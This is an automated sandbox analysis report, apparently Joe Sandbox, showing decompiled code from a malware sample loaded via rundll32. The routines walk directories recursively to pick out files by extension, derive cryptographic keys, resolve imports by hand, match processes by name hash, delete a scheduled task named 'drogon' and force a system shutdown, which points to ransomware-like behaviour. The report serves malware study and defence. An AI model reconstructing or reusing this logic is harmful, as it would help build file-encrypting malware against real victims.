                                                                                                          • Opcode ID: a1279d8ea8d16a685c5668808da52aa61cd0ca80019001b401211b3a1cd043d1
                                                                                                          • Instruction ID: 980b346f91f27703540f2510e867cef4a52dd9cef7e768633a92b81856d5d7da
                                                                                                          • Opcode Fuzzy Hash: a1279d8ea8d16a685c5668808da52aa61cd0ca80019001b401211b3a1cd043d1
                                                                                                          • Instruction Fuzzy Hash: 22215E75901218FBEF219F969C44EDFBF7DEFD9790F048011FA09A6090D6729A01DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 94%
                                                                                                          			E04A45E9F(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				short _v524;
                                                                                                          				short _v532;
                                                                                                          				short _v1052;
                                                                                                          				short _v1060;
                                                                                                          				struct _WIN32_FIND_DATAW _v1644;
                                                                                                          				void* _v1648;
                                                                                                          				signed int _v1652;
                                                                                                          				int _t44;
                                                                                                          				long _t52;
                                                                                                          				intOrPtr* _t53;
                                                                                                          				int _t55;
                                                                                                          				intOrPtr* _t56;
                                                                                                          				WCHAR* _t61;
                                                                                                          				void* _t62;
                                                                                                          				WCHAR** _t69;
                                                                                                          				intOrPtr* _t73;
                                                                                                          				intOrPtr* _t74;
                                                                                                          				intOrPtr* _t75;
                                                                                                          				intOrPtr _t79;
                                                                                                          				intOrPtr _t80;
                                                                                                          				void* _t81;
                                                                                                          				intOrPtr _t82;
                                                                                                          				intOrPtr _t83;
                                                                                                          				intOrPtr _t89;
                                                                                                          				signed int _t90;
                                                                                                          				signed int _t91;
                                                                                                          				void* _t93;
                                                                                                          				WCHAR* _t114;
                                                                                                          
                                                                                                          				_t93 = (_t91 & 0xfffffff8) - 0x668;
                                                                                                          				if(_a8 == 0) {
                                                                                                          					L39:
                                                                                                          					return _t44;
                                                                                                          				}
                                                                                                          				_t44 = PathCombineW( &_v524, _a4, "*");
                                                                                                          				if(_t44 == 0) {
                                                                                                          					goto L39;
                                                                                                          				}
                                                                                                          				_t44 = FindFirstFileW( &_v532,  &_v1644); // executed
                                                                                                          				_v1648 = _t44;
                                                                                                          				if(_t44 == 0xffffffff) {
                                                                                                          					goto L39;
                                                                                                          				} else {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				while(1) {
                                                                                                          					L3:
                                                                                                          					_t52 = WaitForMultipleObjects((0 |  *((intOrPtr*)(_a12 + 0x4c)) != 0x00000000) + 1, _a12 + 0x48, 0, 0);
                                                                                                          					if(_t52 == 0 || _t52 == 1 || _t52 == 0xffffffff) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t73 = ".";
                                                                                                          					_t53 =  &(_v1644.cFileName);
                                                                                                          					while(1) {
                                                                                                          						_t79 =  *_t53;
                                                                                                          						if(_t79 !=  *_t73) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						if(_t79 == 0) {
                                                                                                          							L11:
                                                                                                          							_t53 = 0;
                                                                                                          							L13:
                                                                                                          							if(_t53 == 0) {
                                                                                                          								L37:
                                                                                                          								_t55 = FindNextFileW(_v1648,  &_v1644); // executed
                                                                                                          								if(_t55 != 0) {
                                                                                                          									goto L3;
                                                                                                          								}
                                                                                                          								goto L38;
                                                                                                          							}
                                                                                                          							_t74 = L"..";
                                                                                                          							_t56 =  &(_v1644.cFileName);
                                                                                                          							while(1) {
                                                                                                          								_t80 =  *_t56;
                                                                                                          								if(_t80 !=  *_t74) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								if(_t80 == 0) {
                                                                                                          									L19:
                                                                                                          									_t56 = 0;
                                                                                                          									L21:
                                                                                                          									if(_t56 != 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0) {
                                                                                                          										if((_v1652 & 0x00000010) == 0 || (_v1652 & 0x00000400) != 0) {
                                                                                                          											_t61 = PathFindExtensionW( &(_v1644.dwReserved0));
                                                                                                          											_t75 =  &(_v1644.dwReserved0);
                                                                                                          											_t81 = _t75 + 2;
                                                                                                          											do {
                                                                                                          												_t89 =  *_t75;
                                                                                                          												_t75 = _t75 + 2;
                                                                                                          											} while (_t89 != 0);
                                                                                                          											if(_t61 == _t93 + 0x3c + (_t75 - _t81 >> 1) * 2) {
                                                                                                          												_t62 = 0;
                                                                                                          											} else {
                                                                                                          												_t62 = E04A459B1(_t61);
                                                                                                          											}
                                                                                                          											if(_t62 != 0) {
                                                                                                          												E04A45D0A(_t81,  &_v1060, _a12); // executed
                                                                                                          											}
                                                                                                          										} else {
                                                                                                          											_t90 = 0;
                                                                                                          											_t114 =  *0x4a53014; // 0x4a51528
                                                                                                          											if(_t114 == 0) {
                                                                                                          												L29:
                                                                                                          												E04A45E9F( &_v1060, _a8 - 1, _a12); // executed
                                                                                                          												goto L37;
                                                                                                          											}
                                                                                                          											_t69 = 0x4a53014;
                                                                                                          											while(StrStrIW( &_v1060,  *_t69) == 0) {
                                                                                                          												_t90 = _t90 + 1;
                                                                                                          												_t69 =  &(0x4a53014[_t90]);
                                                                                                          												if( *_t69 != 0) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L29;
                                                                                                          											}
                                                                                                          										}
                                                                                                          									}
                                                                                                          									goto L37;
                                                                                                          								}
                                                                                                          								_t82 =  *((intOrPtr*)(_t56 + 2));
                                                                                                          								_t17 = _t74 + 2; // 0x2e
                                                                                                          								if(_t82 !=  *_t17) {
                                                                                                          									break;
                                                                                                          								}
                                                                                                          								_t56 = _t56 + 4;
                                                                                                          								_t74 = _t74 + 4;
                                                                                                          								if(_t82 != 0) {
                                                                                                          									continue;
                                                                                                          								}
                                                                                                          								goto L19;
                                                                                                          							}
                                                                                                          							asm("sbb eax, eax");
                                                                                                          							asm("sbb eax, 0xffffffff");
                                                                                                          							goto L21;
                                                                                                          						}
                                                                                                          						_t83 =  *((intOrPtr*)(_t53 + 2));
                                                                                                          						_t14 = _t73 + 2; // 0x650000
                                                                                                          						if(_t83 !=  *_t14) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						_t53 = _t53 + 4;
                                                                                                          						_t73 = _t73 + 4;
                                                                                                          						if(_t83 != 0) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						goto L11;
                                                                                                          					}
                                                                                                          					asm("sbb eax, eax");
                                                                                                          					asm("sbb eax, 0xffffffff");
                                                                                                          					goto L13;
                                                                                                          				}
                                                                                                          				L38:
                                                                                                          				_t44 = FindClose(_v1648); // executed
                                                                                                          				goto L39;
                                                                                                          			}































                                                                                                          0x04a45ea5
                                                                                                          0x04a45eb2
                                                                                                          0x04a4607d
                                                                                                          0x04a46082
                                                                                                          0x04a46082
                                                                                                          0x04a45ec8
                                                                                                          0x04a45ed0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45ee3
                                                                                                          0x04a45ee9
                                                                                                          0x04a45ef0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45ef6
                                                                                                          0x04a45ef6
                                                                                                          0x04a45f09
                                                                                                          0x04a45f11
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f29
                                                                                                          0x04a45f2e
                                                                                                          0x04a45f32
                                                                                                          0x04a45f32
                                                                                                          0x04a45f38
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f3d
                                                                                                          0x04a45f54
                                                                                                          0x04a45f54
                                                                                                          0x04a45f5d
                                                                                                          0x04a45f5f
                                                                                                          0x04a4605c
                                                                                                          0x04a46065
                                                                                                          0x04a4606d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4606d
                                                                                                          0x04a45f65
                                                                                                          0x04a45f6a
                                                                                                          0x04a45f6e
                                                                                                          0x04a45f6e
                                                                                                          0x04a45f74
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f79
                                                                                                          0x04a45f90
                                                                                                          0x04a45f90
                                                                                                          0x04a45f99
                                                                                                          0x04a45f9b
                                                                                                          0x04a45fc4
                                                                                                          0x04a4601b
                                                                                                          0x04a46021
                                                                                                          0x04a46025
                                                                                                          0x04a46028
                                                                                                          0x04a46028
                                                                                                          0x04a4602b
                                                                                                          0x04a4602e
                                                                                                          0x04a4603d
                                                                                                          0x04a46046
                                                                                                          0x04a4603f
                                                                                                          0x04a4603f
                                                                                                          0x04a4603f
                                                                                                          0x04a4604a
                                                                                                          0x04a46057
                                                                                                          0x04a46057
                                                                                                          0x04a45fd0
                                                                                                          0x04a45fd0
                                                                                                          0x04a45fd2
                                                                                                          0x04a45fd8
                                                                                                          0x04a45fff
                                                                                                          0x04a4600f
                                                                                                          0x00000000
                                                                                                          0x04a4600f
                                                                                                          0x04a45fda
                                                                                                          0x04a45fdf
                                                                                                          0x04a45ff3
                                                                                                          0x04a45ff4
                                                                                                          0x04a45ffd
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45ffd
                                                                                                          0x04a45fdf
                                                                                                          0x04a45fc4
                                                                                                          0x00000000
                                                                                                          0x04a45f9b
                                                                                                          0x04a45f7b
                                                                                                          0x04a45f7f
                                                                                                          0x04a45f83
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f85
                                                                                                          0x04a45f88
                                                                                                          0x04a45f8e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f8e
                                                                                                          0x04a45f94
                                                                                                          0x04a45f96
                                                                                                          0x00000000
                                                                                                          0x04a45f96
                                                                                                          0x04a45f3f
                                                                                                          0x04a45f43
                                                                                                          0x04a45f47
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f49
                                                                                                          0x04a45f4c
                                                                                                          0x04a45f52
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a45f52
                                                                                                          0x04a45f58
                                                                                                          0x04a45f5a
                                                                                                          0x00000000
                                                                                                          0x04a45f5a
                                                                                                          0x04a46073
                                                                                                          0x04a46077
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • PathCombineW.SHLWAPI(?,?,04A51554,?,?), ref: 04A45EC8
                                                                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 04A45EE3
                                                                                                          • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04A45F09
                                                                                                          • PathCombineW.SHLWAPI(?,?,?), ref: 04A45FB1
                                                                                                          • StrStrIW.SHLWAPI(?,04A53014), ref: 04A45FE9
                                                                                                          • PathFindExtensionW.SHLWAPI(?), ref: 04A4601B
                                                                                                          • FindNextFileW.KERNELBASE(?,?), ref: 04A46065
                                                                                                          • FindClose.KERNELBASE(?), ref: 04A46077
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 1251538951-0
                                                                                                          • Opcode ID: 9a956a4f2bb40c42fd8a157173c0b2d9dc7b79ee97da98477d7d0bca4bc247fa
                                                                                                          • Instruction ID: 86488c1a9b5a705de5daaeafde62e69b381e7f6a86b842ab4360ae777e25c106
                                                                                                          • Opcode Fuzzy Hash: 9a956a4f2bb40c42fd8a157173c0b2d9dc7b79ee97da98477d7d0bca4bc247fa
                                                                                                          • Instruction Fuzzy Hash: 53510271504205AFEB30DF24CC48ABE73B9FBD1715F548A2AEA52C60A0E737E945CB12
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 75%
                                                                                                          			E04A48A23() {
                                                                                                          				void* _t4;
                                                                                                          
                                                                                                          				_t4 = E04A4808E(); // executed
                                                                                                          				if(( *0x4a57bc0 & 0x00000002) != 0) {
                                                                                                          					_t4 = E04A47FB7(L"schtasks /Delete /F /TN drogon", 0); // executed
                                                                                                          				}
                                                                                                          				if(( *0x4a57bc0 & 0x00000001) != 0) {
                                                                                                          					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, 1, 0x80000000); // executed
                                                                                                          					if(_t4 == 0) {
                                                                                                          						ExitWindowsEx(6, 0); // executed
                                                                                                          					}
                                                                                                          				}
                                                                                                          				ExitProcess(0);
                                                                                                          			}




                                                                                                          0x04a48a24
                                                                                                          0x04a48a32
                                                                                                          0x04a48a3a
                                                                                                          0x04a48a3a
                                                                                                          0x04a48a46
                                                                                                          0x04a48a54
                                                                                                          0x04a48a5c
                                                                                                          0x04a48a61
                                                                                                          0x04a48a61
                                                                                                          0x04a48a5c
                                                                                                          0x04a48a68

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A4808E: wsprintfW.USER32 ref: 04A480BC
                                                                                                            • Part of subcall function 04A4808E: wsprintfW.USER32 ref: 04A480CC
                                                                                                            • Part of subcall function 04A4808E: wsprintfW.USER32 ref: 04A480DC
                                                                                                            • Part of subcall function 04A4808E: wsprintfW.USER32 ref: 04A480EC
                                                                                                            • Part of subcall function 04A4808E: wsprintfW.USER32 ref: 04A48126
                                                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04A48A54
                                                                                                          • ExitWindowsEx.USER32(00000006,00000000), ref: 04A48A61
                                                                                                          • ExitProcess.KERNEL32 ref: 04A48A68
                                                                                                            • Part of subcall function 04A47FB7: wsprintfW.USER32 ref: 04A47FD6
                                                                                                            • Part of subcall function 04A47FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04A47FFA
                                                                                                            • Part of subcall function 04A47FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A4800C
                                                                                                            • Part of subcall function 04A47FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04A48022
                                                                                                            • Part of subcall function 04A47FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04A48069
                                                                                                            • Part of subcall function 04A47FB7: Sleep.KERNELBASE(00000000), ref: 04A4807F
                                                                                                          Strings
                                                                                                          • schtasks /Delete /F /TN drogon, xrefs: 04A48A35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                                                                                          • String ID: schtasks /Delete /F /TN drogon
                                                                                                          • API String ID: 3579268615-951750757
                                                                                                          • Opcode ID: 51aa8c7943ed8718d064c7b55b9b605f46dea6c903f67a123548aba674569a19
                                                                                                          • Instruction ID: 07c7563c1ec6fc27ec01fe3efde56cf249a5e3642ebfd8692f7fb0d902ad6680
                                                                                                          • Opcode Fuzzy Hash: 51aa8c7943ed8718d064c7b55b9b605f46dea6c903f67a123548aba674569a19
                                                                                                          • Instruction Fuzzy Hash: 22E01A3C15226076F23267216E0DF9F2D4DEFE2B54F050108F945710C187DE5942C5B5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 84%
                                                                                                          			E04A49016() {
                                                                                                          				signed int _v8;
                                                                                                          				signed int _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				long _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				void* _t48;
                                                                                                          				int _t53;
                                                                                                          				int _t57;
                                                                                                          				struct HINSTANCE__* _t60;
                                                                                                          				intOrPtr _t61;
                                                                                                          				signed int _t62;
                                                                                                          				signed int _t63;
                                                                                                          				long _t66;
                                                                                                          				intOrPtr* _t70;
                                                                                                          				intOrPtr _t71;
                                                                                                          				signed int _t73;
                                                                                                          				intOrPtr _t75;
                                                                                                          				signed int _t77;
                                                                                                          				signed int* _t80;
                                                                                                          				intOrPtr _t82;
                                                                                                          				signed int* _t85;
                                                                                                          
                                                                                                          				_t71 =  *0x4a57b98;
                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                          				_t48 =  *((intOrPtr*)(_t71 + 0x3c)) + _t71;
                                                                                                          				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
                                                                                                          				if(_t70 != 0) {
                                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                                          					_t77 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                          					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                          					_v16 = _t82;
                                                                                                          					if(_t77 > 0) {
                                                                                                          						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
                                                                                                          						_v20 = _t66;
                                                                                                          						do {
                                                                                                          							_t75 =  *((intOrPtr*)(_t82 + 0xc));
                                                                                                          							if(_t66 < _t75) {
                                                                                                          								goto L5;
                                                                                                          							} else {
                                                                                                          								_v24 =  *(_t82 + 8) + _t75;
                                                                                                          								_t66 = _v20;
                                                                                                          								if(_t66 >= _v24) {
                                                                                                          									goto L5;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							goto L6;
                                                                                                          							L5:
                                                                                                          							_v12 = _v12 + 1;
                                                                                                          							_t82 = _t82 + 0x28;
                                                                                                          							_v16 = _t82;
                                                                                                          						} while (_v12 < _t77);
                                                                                                          					}
                                                                                                          					L6:
                                                                                                          					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
                                                                                                          					if(_t53 != 0) {
                                                                                                          						_v8 = 1;
                                                                                                          						if( *_t70 == 0) {
                                                                                                          							L22:
                                                                                                          							_t57 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x4a57b98,  *(_t82 + 8), _v20,  &_v20); // executed
                                                                                                          							_v8 = _t57;
                                                                                                          						} else {
                                                                                                          							while(_v8 == 1) {
                                                                                                          								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x4a57b98); // executed
                                                                                                          								_v12 = _t60;
                                                                                                          								if(_t60 == 0) {
                                                                                                          									_v8 = _v8 & 0x00000000;
                                                                                                          								} else {
                                                                                                          									_t61 =  *0x4a57b98;
                                                                                                          									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
                                                                                                          									_t80 =  *_t70 + _t61;
                                                                                                          									while(1) {
                                                                                                          										_t62 =  *_t80;
                                                                                                          										if(_t62 == 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										if(_v8 == 1) {
                                                                                                          											_t73 = _t62 & 0x7fffffff;
                                                                                                          											if(_t73 != _t62) {
                                                                                                          												_push(_t73);
                                                                                                          											} else {
                                                                                                          												_push( *0x4a57b98 + _t73 + 2);
                                                                                                          											}
                                                                                                          											_t63 = GetProcAddress(_v12, ??); // executed
                                                                                                          											 *_t85 = _t63;
                                                                                                          											if(_t63 == 0) {
                                                                                                          												_v8 = _v8 & _t63;
                                                                                                          											}
                                                                                                          											_t85 =  &(_t85[1]);
                                                                                                          											_t80 =  &(_t80[1]);
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										break;
                                                                                                          									}
                                                                                                          									_t82 = _v16;
                                                                                                          								}
                                                                                                          								_t70 = _t70 + 0x14;
                                                                                                          								if( *_t70 != 0) {
                                                                                                          									continue;
                                                                                                          								}
                                                                                                          								break;
                                                                                                          							}
                                                                                                          							if(_v8 != 0) {
                                                                                                          								goto L22;
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          			}
























                                                                                                          0x04a4901c
                                                                                                          0x04a49025
                                                                                                          0x04a49029
                                                                                                          0x04a49032
                                                                                                          0x04a49034
                                                                                                          0x04a4903e
                                                                                                          0x04a49044
                                                                                                          0x04a49048
                                                                                                          0x04a4904c
                                                                                                          0x04a49051
                                                                                                          0x04a49053
                                                                                                          0x04a49059
                                                                                                          0x04a4905c
                                                                                                          0x04a4905c
                                                                                                          0x04a49061
                                                                                                          0x00000000
                                                                                                          0x04a49063
                                                                                                          0x04a49068
                                                                                                          0x04a4906b
                                                                                                          0x04a49071
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49071
                                                                                                          0x00000000
                                                                                                          0x04a49073
                                                                                                          0x04a49073
                                                                                                          0x04a49076
                                                                                                          0x04a49079
                                                                                                          0x04a4907c
                                                                                                          0x04a4905c
                                                                                                          0x04a49081
                                                                                                          0x04a49090
                                                                                                          0x04a49098
                                                                                                          0x04a490a1
                                                                                                          0x04a490a8
                                                                                                          0x04a49129
                                                                                                          0x04a4913d
                                                                                                          0x04a49143
                                                                                                          0x04a490aa
                                                                                                          0x04a490aa
                                                                                                          0x04a490ba
                                                                                                          0x04a490c0
                                                                                                          0x04a490c5
                                                                                                          0x04a4914e
                                                                                                          0x04a490cb
                                                                                                          0x04a490cb
                                                                                                          0x04a490d5
                                                                                                          0x04a490d7
                                                                                                          0x04a49112
                                                                                                          0x04a49112
                                                                                                          0x04a49116
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a490df
                                                                                                          0x04a490e3
                                                                                                          0x04a490eb
                                                                                                          0x04a490f9
                                                                                                          0x04a490ed
                                                                                                          0x04a490f6
                                                                                                          0x04a490f6
                                                                                                          0x04a490fd
                                                                                                          0x04a49103
                                                                                                          0x04a49107
                                                                                                          0x04a49109
                                                                                                          0x04a49109
                                                                                                          0x04a4910c
                                                                                                          0x04a4910f
                                                                                                          0x00000000
                                                                                                          0x04a4910f
                                                                                                          0x00000000
                                                                                                          0x04a490df
                                                                                                          0x04a49118
                                                                                                          0x04a49118
                                                                                                          0x04a4911b
                                                                                                          0x04a49121
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49121
                                                                                                          0x04a49127
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a49127
                                                                                                          0x04a490a8
                                                                                                          0x04a49147
                                                                                                          0x04a4914d

                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04A49090
                                                                                                          • LoadLibraryA.KERNELBASE(?), ref: 04A490BA
                                                                                                          • GetProcAddress.KERNELBASE(00000000,?), ref: 04A490FD
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04A4913D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 3300690313-0
                                                                                                          • Opcode ID: 4a84d9edc64b04f5fb9768367d6c0e322f41ac9c41df7b4b15109993f0ae3725
                                                                                                          • Instruction ID: bd2f086139bf99d27e887e8dd265ada80bf7ebd0fae4743337cce078402ab2d4
                                                                                                          • Opcode Fuzzy Hash: 4a84d9edc64b04f5fb9768367d6c0e322f41ac9c41df7b4b15109993f0ae3725
                                                                                                          • Instruction Fuzzy Hash: B04156B5A01216EFDB10CFA8C988BAFB3F8EFC4319F1584A9D415A7201E375E9918B10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04A462E0,?,?,?,?), ref: 04A460A6
                                                                                                          • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04A462E0,?,?,?,?), ref: 04A460BA
                                                                                                          • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04A462E0,?,?,?,?), ref: 04A460D3
                                                                                                          • CryptDestroyHash.ADVAPI32(?,?,?,?,04A462E0,?,?,?,?), ref: 04A460DF
                                                                                                            • Part of subcall function 04A4559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04A455BC
                                                                                                            • Part of subcall function 04A4559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04A455CB
                                                                                                            • Part of subcall function 04A4559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04A455DA
                                                                                                            • Part of subcall function 04A4559B: LocalAlloc.KERNEL32(00000040,?), ref: 04A455EE
                                                                                                            • Part of subcall function 04A4559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04A45601
                                                                                                            • Part of subcall function 04A4559B: LocalFree.KERNEL32(?), ref: 04A45606
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 797921460-0
                                                                                                          • Opcode ID: 74217220a708ebde3c4e7c7195d5fed69f9cbb5f3979a8dd753237d35f26753f
                                                                                                          • Instruction ID: 84bba4771a8c054e14cd897a9afa03e104efcf282543adeab831cc36369f9e07
                                                                                                          • Opcode Fuzzy Hash: 74217220a708ebde3c4e7c7195d5fed69f9cbb5f3979a8dd753237d35f26753f
                                                                                                          • Instruction Fuzzy Hash: E6015E75900208BFFB108F94EC88DAEBBBDEBC4751F104469F201A6140DAB6AE419B20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 91%
                                                                                                          			E04A484EE() {
                                                                                                          				char _v524;
                                                                                                          				int _v552;
                                                                                                          				void* _v560;
                                                                                                          				void* _t6;
                                                                                                          				int _t8;
                                                                                                          				int _t12;
                                                                                                          				void* _t14;
                                                                                                          
                                                                                                          				_t6 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                          				_t14 = _t6;
                                                                                                          				if(_t14 != 0xffffffff) {
                                                                                                          					_push( &_v560);
                                                                                                          					_v560 = 0x22c;
                                                                                                          					_t8 = Process32FirstW(_t14);
                                                                                                          					while(_t8 != 0) {
                                                                                                          						if(E04A482EE( &_v524) == 0xf4713b0e) {
                                                                                                          							E04A4841D(_v552);
                                                                                                          							L7:
                                                                                                          							_t12 = FindCloseChangeNotification(_t14); // executed
                                                                                                          							return _t12;
                                                                                                          						}
                                                                                                          						_t8 = Process32NextW(_t14,  &_v560);
                                                                                                          					}
                                                                                                          					goto L7;
                                                                                                          				}
                                                                                                          				return _t6;
                                                                                                          			}










                                                                                                          0x04a484fc
                                                                                                          0x04a48502
                                                                                                          0x04a48507
                                                                                                          0x04a4850f
                                                                                                          0x04a48511
                                                                                                          0x04a4851b
                                                                                                          0x04a48544
                                                                                                          0x04a48534
                                                                                                          0x04a48550
                                                                                                          0x04a48555
                                                                                                          0x04a48556
                                                                                                          0x00000000
                                                                                                          0x04a48556
                                                                                                          0x04a4853e
                                                                                                          0x04a4853e
                                                                                                          0x00000000
                                                                                                          0x04a48548
                                                                                                          0x04a4855e

                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A484FC
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 04A4851B
